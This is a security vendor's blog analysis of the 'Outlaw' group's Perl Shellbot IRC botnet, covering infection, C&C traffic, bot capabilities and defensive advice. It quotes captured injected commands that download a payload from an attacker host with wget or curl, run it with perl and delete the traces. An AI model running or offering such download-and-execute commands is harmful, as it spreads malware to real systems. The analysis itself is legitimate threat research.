[Trend Micro](https://www.trendmicro.com/) [About TrendLabs Security Intelligence Blog](https://blog.trendmicro.com/trendlabs-security-intelligence/about-us/) Search: Go to… [Home](http://blog.trendmicro.com/trendlabs-security-intelligence/) Categories [Home » Botnets » Perl-Based Shellbot Looks to Target Organizations via C&C](https://blog.trendmicro.com/trendlabs-security-intelligence/) # Perl-Based Shellbot Looks to Target Organizations via C&C [Posted on:November 1, 2018 at 12:04 am](https://blog.trendmicro.com/trendlabs-security-intelligence/2018/11/) [Posted in:Botnets, Internet of Things, Malware](https://blog.trendmicro.com/trendlabs-security-intelligence/category/botnets/) Author: [Trend Micro Cyber Safety Solutions Team](https://blog.trendmicro.com/trendlabs-security-intelligence/author/cybersafety/) 0 We uncovered an operation of a hacking group, which we’re naming “Outlaw” (translation derived from the Romanian word haiduc, the hacking tool the group primarily uses), involving the use of an IRC bot built with the help of Perl Shellbot. The group distributes the bot by exploiting a common command injection [vulnerability on internet of things (IoT) devices and Linux servers. Further research indicates that the threat](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-1000117) can also affect Windows-based environments and even Android devices. Go to… ----- institution, as well as a Bangladeshi government site over [a vulnerability on Dovecot mail server. They then](http://www.securiteam.com/unixfocus/6H00L0UHFC.html) used two compromised servers and linked them to a high availability cluster to host an IRC bouncer, which was used to command and control the emerging botnet. Aside from finding several exploit files that allowed us to understand how the initial exploit on the first server worked, we also found configuration files of the [hackers’ toolset that allowed them to target organizations](https://documents.trendmicro.com/assets/Perl-Based_Shellbot_Looks_to_Target_Organizations_via_C&C_appendix.pdf) through DoS and SSH brute force, using so-called “class files.” Moreover, this suggests that the threat actors were building a botnet that can be used for cybercriminal purposes. The operation particularly caught our attention after various sensors of our honeypots started to capture new injected commands: **Source** **Command** 107.1.153.75 195.154.43.102 218.25.74.221 61.8.73.166 61.8.73.166 69.64.62.159 _uname -a; wget hxxp://54[.]37[.]72[.]170/n3;_ _curl -O hxxp://54[.]37[.]72[.]170/n3; perl n3;_ _rm -rf n3; rm -rf n3.*_ _uname -a; wget_ _ftp://museum:museum04@153[.]122[.]156[.]2_ _32/Mail/n3; rm -rf n3; rm -rf n3.*_ _uname -a; wget hxxp://54[.]37[.]72[.]170/n3;_ _curl -O hxxp://54[.]37[.]72[.]170/n3; perl n3;_ _rm -rf n3; rm -rf n3.*_ _uname -a; wget hxxp://54[.]37[.]72[.]170/n3;_ _curl -O hxxp://54[.]37[.]72[.]170/n3; perl n3;_ _rm -rf n3; rm -rf n3.*_ _uname -a; wget hxxp://54[.]37[.]72[.]170/n3;_ _curl -O hxxp://54[.]37[.]72[.]170/n3; perl n3;_ _rm -rf n3; rm -rf n3.*;wget_ _hxxp://54[.]37[.]72[.]170/n.tgz;tar -xzvf_ _n.tgz;rm -rf n.tgz;cd .s;./run;cd /tmp_ _uname -a;cd /tmp;wget_ _hxxp://54[.]37[.]72[.]170/n3;perl n3;rm -rf_ _n3*_ _Table 1. Commands we identified_ _Note: Source – Source IP address which tried to inject the command;_ _Command – Command as captured by the honeypot sensor utility_ **Country** Taiwan Japan United States India United Kingdom Israel Kuwait Brazil Colombia Germany Switzerland Thailand Bulgaria Greece Italy Malaysia ----- _(based on Trend Micro Smart Protection Network feedback)_ The botnet itself is built with a Shellbot variant with script written in Perl and even available on GitHub. The botnet was previously distributed via an exploit of the [Shellshock vulnerability, hence the name “Shellbot.”](https://blog.trendmicro.com/trendlabs-security-intelligence/one-year-after-shellshock-are-your-servers-and-devices-safer/) This time, the threat actors mostly distribute it via previously brute-forced or compromised hosts. In order to look into the threat’s behavior, we looked into our honeypots with several hosts: Host #1: The Ubuntu 16.04 based host with Splunk forwarder for monitoring Host #2: The Ubuntu 16.04 server with Dovecot mail server installed Host #3: An Android device running Android 7, [one of the most popular versions and can be easily](https://developer.android.com/about/dashboards/) rooted We then monitored the C&C traffic and obtained the IRC channels’ information. By the first infection, around 142 hosts were present in the IRC channel. ### How it infects systems A command is first run on the IoT device or server. In this example, the command “uname -a;cd /tmp;wget _hxxp://54[.]37[.]72[.]170/n3;perl n3;rm -rf n3*” verifies that the host accepts commands from the_ command-line interface (CLI) with “uname -a“. Once the command runs successfully, the working directory is changed to “/tmp“. The downloaded payload, n3 file (detected by Trend Micro as [PERL_SHELLBOT.SM),](https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/perl_shellbot.sm) is then consequently run with perl interpreter. In the final step of the chain, the n3 file is removed, with no trace of activity left on the attacked system. _Figure 1. Actual payload, with filename n3_ Once the bot is installed, it starts to communicate with one of the C&C servers via IRC. _Figure 2. The bot runs as “/usr/sbin/httpd”_ _Figure 3. Outgoing connection to one of the C&C servers, luci[.]madweb[.]ro_ The C&C connection attempt occurs right after the infection and is persistent. In case of lost connectivity, it immediately reconnects once an internet connection is available. At this stage, restarting the infected machine ----- hosts. Reconstructed Transmission Control Protocol (TCP) streams show in clear text the download of the malicious file and subsequent communication with the C&C servers. ### Captured network traffic during the infection A TCP stream from traffic capture between the infected host and C&C server at the time of the infection below shows that the n3 file was consequently downloaded and run on the target system. _Figure 4. TCP stream from network traffic between the infected host and C&C server_ _Figure 5. TCP communication stream after the infection_ After the infection, the communication shows that it joined the bot’s IRC channel and assigned nickname and server configuration information. Modifying Domain Name System (DNS) settings should show and confirm that a real target is involved (not just the honeypot) and that it has visibility to the internet. It also shows the number of processor cores and the type of processor. It also discloses that the Splunk is running on the host by using the command “cat /etc/passwd/” with filtered output. This is to notify the admins that the target device is being monitored or if it has an antivirus (AV) solution installed. It is followed by PING/PONG communication (where the IRC server occasionally sends a PING message, which requires the response of a PONG message to prevent getting disconnected) to keep the communication channel open. ----- _Figure 6. Separate information are sent to IRC admins_ There is a list of hardcoded process names Shellbot is assigned when run. These help hide the running bot from system admins, security monitoring, and researchers. _Figure 7. Screenshot from Shellbot’s configuration file with the available process names_ Once the Shellbot is running on a target system, the administrator of the IRC channel can send various commands to the host. The list includes commands to perform a port scan, perform various forms of distributed denial of service (DDoS), download a file, get information about other machines, or just send the operating system (OS) information and list of certain running processes on the C&C server. ### Possible script functions an IRC command can call ----- _Figure 8. Screenshot of script header with list of available commands_ Some of the IRC-related [functions seen to have been used were join, part, uejoin, op, deop, voice, devoice,](https://gist.github.com/xero/2d6e4b061b4ecbeb9f99) _nick, msg, quit, uaw, and die. DDoS-related activity affects User Data Protocol (UDP), TCP, and HTTP_ traffic. If a port scan is invoked, the bot always scans the following ports: **Ports** 1 7 9 14 20 21 22 23 25 53 80 88 110 112 113 137 143 145 222 333 405 443 444 445 512 587 616 666 993 995 1024 1025 1080 1144 1156 1222 1230 1337 1348 1628 1641 1720 1723 1763 1983 1984 1985 1987 1988 1990 1994 2005 2020 2121 2200 2222 2223 2345 2360 2500 2727 3130 3128 3137 3129 3303 3306 3333 3389 4000 4001 4471 4877 5252 5522 5553 5554 5642 5777 5800 5801 5900 5901 6062 6550 6522 6600 6622 6662 6665 6666 6667 6969 7000 7979 8008 8080 8081 8082 8181 8246 8443 8520 8787 8855 8880 8989 9855 9865 9997 9999 10000 10001 10010 10222 11170 11306 11444 12241 12312 14534 14568 15951 17272 19635 19906 19900 20000 21412 21443 21205 22022 30999 31336 31337 32768 33180 35651 36666 37998 41114 41215 44544 45055 45555 45678 51114 51247 51234 55066 55555 65114 65156 65120 65410 65500 65501 65523 65533 _Table 3. Ports scanned by the bot_ ### Sample of network communication captured on infected hosts This network communication seems to be the output of an [XMR rig mining monitoring tool.](https://forums.servethehome.com/index.php?threads/sth-xmrig-monero-mining-docker-image.17049/page-2) Code of the tool: _root@ubuntu:~$ cat speed.sh_ _i=1_ _result=`docker ps -q | wc -l`_ _while [ “$i” -le “$result” ]_ _do_ _echo “miner numa $i speed”_ ----- _rm /tmp/minernuma$i.tmp_ _i=$(($i + 1))_ _done_ ### Reconstructed TCP streams from the traffic capture of C&C commands The infected host always gets assigned a nickname of “sEx” along with a randomly generated integer. In this example, the host nickname is “sEx-3635”. _Figure 9. TCP stream with a sample host nickname_ All infected hosts also showed base C&C connection in the form of PING/PONG traffic, occasionally asked for updates, and provided some host information like suspicious crontab-like records and process identifier (PID) of the sd-pam process of the user who was running the IRC bot on the system. The following is the information exchange about a host, possibly the bot’s new joiner or another target indirectly scanned over the zombie hosts, the infected host in this case: ----- _Figure 10. Host information exchange TCP stream_ _Figure 11. One of the spotted identities linked to compromised servers_ During the traffic monitoring, several identities such as luci, lucian, dragos, mazy, hydra, and poseidon were spotted in IRC communication channels. These identities were also found as usernames on a compromised Japanese server This server seemed to have ----- the following example: _Figure 12. Dragos SSH login_ Using the credentials from one of the commands injected into the honeypots, we were able to get downloads of the files that the threat actors used. The files’ contents often changed on the server (some were deleted, while some were added). According to the time correlation, it mostly happened in the daytime (in Central European Time/CET): during business hours and times. The activity never happened at night or on the weekends, suggesting that the threat actors operated on a somewhat daily basis. Find a more extensive run-through of this operation, such as how the IRC bouncer involved comments in the Romanian language, the hacking tools used, exploits related to Ubuntu, and the indicators of compromise (IoCs), in the **_[Appendix.](https://documents.trendmicro.com/assets/Perl-Based_Shellbot_Looks_to_Target_Organizations_via_C&C_appendix.pdf)_** ### Preventing compromise from malicious bot-related activities The Outlaw group here used an IRC bot, which isn’t a novel threat. The code used is available online, making it possible to build such a bot (with a fully undetectable toolset) and operate it under the radar of common network security solutions. Additionally, in this particular operation, it should be noted that the attackers looked into targeting big companies. While we haven’t seen widespread attacks from this hacking group, it is important to adopt security measures that can defend systems against any potential attacks, such as: Setting up the SSH login process properly. Do not leave it open to public networks unless it is necessary for your infrastructure. Many devices run an SSH service by default, unnecessarily, with default credentials. This is particularly true in the case of network infrastructure devices like switches and firewalls. Monitoring the commands used on CLI on your systems. Monitoring non-DNS traffic coming to and from port 53. Detecting creation of new accounts and regularly verifying that all created accounts are only used for business purposes. Restricting the use of FTP as much as possible. Not only does it transfer passwords in clear text, but is also usually used for loading the exploit files on local systems. The same goes for the web directories. Any newly created files should be considered suspicious unless they are in an intended folder in the system. Reconsidering the use of Dovecot mail server, as it has been found to have a buffer overflow vulnerability (and therefore unsecure). Patch it or at least monitor its file directory for unusual files. Maintaining a mailbox, a contact person, or at least a contact form on your website for reporting any possible abuse or security compromise. Users can also consider adopting security solutions that can provide protection from malicious bot-related activities through a cross-generational blend of threat defense techniques. [Trend Micro™ XGen™ security](https://www.trendmicro.com/en_us/business/products/all-solutions.html) provides high-fidelity machine learning that can secure the [gateway and](https://www.trendmicro.com/en_us/business/products/user-protection/sps.html) [endpoints, and protect physical,](https://www.trendmicro.com/en_us/business/products/user-protection/sps.html) virtual, and cloud workloads. With technologies that employ web/URL filtering, behavioral analysis, and custom sandboxing, XGen security offers protection against ever-changing threats that bypass traditional controls and exploit known and unknown vulnerabilities. XGen security also powers Trend Micro’s suite of security solutions: [Hybrid Cloud Security, User Protection, and](https://www.trendmicro.com/en_us/business/products/hybrid-cloud/cloud-security.html) [Network Defense.](https://www.trendmicro.com/en_us/business/products/network.html) ## Related Posts: **[Keeping a Hidden Identity: Mirai C&Cs in Tor Network](https://blog.trendmicro.com/trendlabs-security-intelligence/keeping-a-hidden-identity-mirai-ccs-in-tor-network/)** ----- Learn how to protect Enterprises, Small Businesses, and Home Users from ransomware: [ENTERPRISE](http://www.trendmicro.com/us/security-intelligence/enterprise-ransomware/index.html) » [SMALL BUSINESS](http://www.trendmicro.com/us/security-intelligence/small-business-ransomware/index.html) » [HOME](http://www.trendmicro.com/us/home/consumer-ransomware/index.html) » Tags: [androidIOTIRC botLinuxWindows](https://blog.trendmicro.com/trendlabs-security-intelligence/tag/android/) ### Security Predictions for 2020 Cybersecurity in 2020 will be viewed through many lenses — from differing attacker motivations and cybercriminal arsenal to technological developments and global threat intelligence — only so defenders can keep up with the broad range of threats. [Read our security predictions for 2020.](https://www.trendmicro.com/vinfo/us/security/research-and-analysis/predictions/2020) ### Business Process Compromise Attackers are starting to invest in long-term operations that target specific processes enterprises rely on. They scout for vulnerable practices, susceptible systems and operational loopholes that they can leverage or abuse. To learn more, [read our Security 101: Business Process Compromise.](https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/security-101-business-process-compromise) ### Recent Posts [New MacOS Dacls RAT Backdoor Show Lazarus’ Multi-Platform Attack Capability](https://blog.trendmicro.com/trendlabs-security-intelligence/new-macos-dacls-rat-backdoor-show-lazarus-multi-platform-attack-capability/) [Targeted Ransomware Attack Hits Taiwanese Organizations](https://blog.trendmicro.com/trendlabs-security-intelligence/targeted-ransomware-attack-hits-taiwanese-organizations/) [WebMonitor RAT Bundled with Zoom Installer](https://blog.trendmicro.com/trendlabs-security-intelligence/webmonitor-rat-bundled-with-zoom-installer/) [Exposed Redis Instances Abused for Remote Code Execution, Cryptocurrency Mining](https://blog.trendmicro.com/trendlabs-security-intelligence/exposed-redis-instances-abused-for-remote-code-execution-cryptocurrency-mining/) [Grouping Linux IoT Malware Samples With Trend Micro ELF Hash](https://blog.trendmicro.com/trendlabs-security-intelligence/grouping-linux-iot-malware-samples-with-trend-micro-elf-hash/) ### Popular Posts [WebMonitor RAT Bundled with Zoom Installer](https://blog.trendmicro.com/trendlabs-security-intelligence/webmonitor-rat-bundled-with-zoom-installer/) [New MacOS Dacls RAT Backdoor Show Lazarus’ Multi-Platform Attack Capability](https://blog.trendmicro.com/trendlabs-security-intelligence/new-macos-dacls-rat-backdoor-show-lazarus-multi-platform-attack-capability/) [Exposing Modular Adware: How DealPly, IsErIk, and ManageX Persist in Systems](https://blog.trendmicro.com/trendlabs-security-intelligence/exposing-modular-adware-how-dealply-iserik-and-managex-persist-in-systems/) [Coronavirus Update App Leads to Project Spy Android and iOS Spyware](https://blog.trendmicro.com/trendlabs-security-intelligence/coronavirus-update-app-leads-to-project-spy-android-and-ios-spyware/) [Dissecting Geost: Exposing the Anatomy of the Android Trojan Targeting Russian Banks](https://blog.trendmicro.com/trendlabs-security-intelligence/dissecting-geost-exposing-the-anatomy-of-the-android-trojan-targeting-russian-banks/) ----- Your email here [Home and Home Office](http://www.trendmicro.com/us/home/index.html) | [For Business](http://www.trendmicro.com/us/business/index.html) | [Security Intelligence](http://www.trendmicro.com/us/security-intelligence/index.html) | [About Trend Micro](http://www.trendmicro.com/us/about-us/index.html) [Asia Pacific Region (APAC): Australia /](http://www.trendmicro.com.au/au/home/index.html) [New Zealand, 中国, ⽇本, 대한민국, 台灣](http://www.trendmicro.co.nz/nz/home/index.html) Latin America Region (LAR): [Brasil, México](http://br.trendmicro.com/br/home/index.html) North America Region (NABU): [United States, Canada](http://www.trendmicro.com/us/index.html) Europe, Middle East, & Africa Region (EMEA): [France, Deutschland / Österreich / Schweiz, Italia,](http://www.trendmicro.fr/) [Россия, España, United Kingdom / Ireland](http://www.trendmicro.com.ru/) [Privacy Statement](http://www.trendmicro.com/us/about-us/legal-policies/privacy-statement/index.html) [Legal Policies](http://www.trendmicro.com/us/about-us/legal-policies/index.html) Copyright © 2020 Trend Micro Incorporated. All rights reserved. Your email here Subscribe -----